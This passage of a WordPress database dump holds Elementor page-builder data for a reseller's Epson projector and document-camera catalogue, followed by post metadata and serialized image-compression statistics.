warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4016,2761,'_elementor_version','0.4'),(4019,2765,'_edit_lock','1549528744:1'),(4020,2765,'_edit_last','1'),(4021,2765,'_wp_page_template','default'),(4022,2765,'_hide_page_title',''),(4023,2765,'_hide_header',''),(4024,2765,'_hide_footer',''),(4025,2765,'_hide_breadcrumb',''),(4026,2765,'_cover',''),(4027,2765,'_show_excerpt',''),(4028,2765,'_wc_apply_product',''),(4029,2765,'_yoast_wpseo_content_score','90'),(4039,2725,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.57443561334311166177712948410771787166595458984375;s:5:\"bytes\";i:6634;s:11:\"size_before\";i:100906;s:10:\"size_after\";i:94272;s:4:\"time\";d:0.5;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.75;s:5:\"bytes\";i:310;s:11:\"size_before\";i:11254;s:10:\"size_after\";i:10944;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1923;s:11:\"size_before\";i:31093;s:10:\"size_after\";i:29170;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:870;s:11:\"size_before\";i:18013;s:10:\"size_after\";i:17143;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3531;s:11:\"size_before\";i:40546;s:10:\"size_after\";i:37015;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4040,2724,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.1025124616081765083208665600977838039398193359375;s:5:\"bytes\";i:4074;s:11:\"size_before\";i:99305;s:10:\"size_after\";i:95231;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:9098;s:10:\"size_after\";i:9098;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.100000000000000088817841970012523233890533447265625;s:5:\"bytes\";i:879;s:11:\"size_before\";i:28364;s:10:\"size_after\";i:27485;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20909;s:10:\"size_after\";i:20909;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:3195;s:11:\"size_before\";i:40934;s:10:\"size_after\";i:37739;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4041,2721,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.346166396322691360953882622197852469980716705322265625;s:5:\"bytes\";i:732;s:11:\"size_before\";i:211459;s:10:\"size_after\";i:210727;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:732;s:11:\"size_before\";i:23492;s:10:\"size_after\";i:22760;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:60799;s:10:\"size_after\";i:60799;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42226;s:10:\"size_after\";i:42226;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:84942;s:10:\"size_after\";i:84942;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4042,2654,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.695216224083839762215575319714844226837158203125;s:5:\"bytes\";i:5780;s:11:\"size_before\";i:30917;s:10:\"size_after\";i:25137;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:322;s:11:\"size_before\";i:2857;s:10:\"size_after\";i:2535;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:1052;s:11:\"size_before\";i:6148;s:10:\"size_after\";i:5096;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:582;s:11:\"size_before\";i:2578;s:10:\"size_after\";i:1996;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.879999999999999005240169935859739780426025390625;s:5:\"bytes\";i:1484;s:11:\"size_before\";i:5965;s:10:\"size_after\";i:4481;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.5;s:5:\"bytes\";i:2340;s:11:\"size_before\";i:13369;s:10:\"size_after\";i:11029;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4043,2649,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.26383493599949048302732990123331546783447265625;s:5:\"bytes\";i:6050;s:11:\"size_before\";i:31406;s:10:\"size_after\";i:25356;s:4:\"time\";d:1.6799999999999999378275106209912337362766265869140625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:398;s:11:\"size_before\";i:2716;s:10:\"size_after\";i:2318;s:4:\"time\";d:1.62999999999999989341858963598497211933135986328125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.5;s:5:\"bytes\";i:1011;s:11:\"size_before\";i:5464;s:10:\"size_after\";i:4453;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:588;s:11:\"size_before\";i:2244;s:10:\"size_after\";i:1656;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.989999999999998436805981327779591083526611328125;s:5:\"bytes\";i:1519;s:11:\"size_before\";i:6909;s:10:\"size_after\";i:5390;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.010000000000001563194018672220408916473388671875;s:5:\"bytes\";i:2534;s:11:\"size_before\";i:14073;s:10:\"size_after\";i:11539;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4044,2648,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.59131176972658039403540897183120250701904296875;s:5:\"bytes\";i:5977;s:11:\"size_before\";i:33977;s:10:\"size_after\";i:28000;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:368;s:11:\"size_before\";i:2734;s:10:\"size_after\";i:2366;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.64999999999999857891452847979962825775146484375;s:5:\"bytes\";i:954;s:11:\"size_before\";i:5731;s:10:\"size_after\";i:4777;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:581;s:11:\"size_before\";i:2739;s:10:\"size_after\";i:2158;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:1452;s:11:\"size_before\";i:7593;s:10:\"size_after\";i:6141;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2622;s:11:\"size_before\";i:15180;s:10:\"size_after\";i:12558;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4045,2647,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.740702186050913979897813987918198108673095703125;s:5:\"bytes\";i:6258;s:11:\"size_before\";i:31701;s:10:\"size_after\";i:25443;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:402;s:11:\"size_before\";i:2660;s:10:\"size_after\";i:2258;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:957;s:11:\"size_before\";i:5511;s:10:\"size_after\";i:4554;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:571;s:11:\"size_before\";i:1976;s:10:\"size_after\";i:1405;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1601;s:11:\"size_before\";i:6783;s:10:\"size_after\";i:5182;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:2727;s:11:\"size_before\";i:14771;s:10:\"size_after\";i:12044;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4046,2646,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.514803438217910525054321624338626861572265625;s:5:\"bytes\";i:6398;s:11:\"size_before\";i:38741;s:10:\"size_after\";i:32343;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:379;s:11:\"size_before\";i:3014;s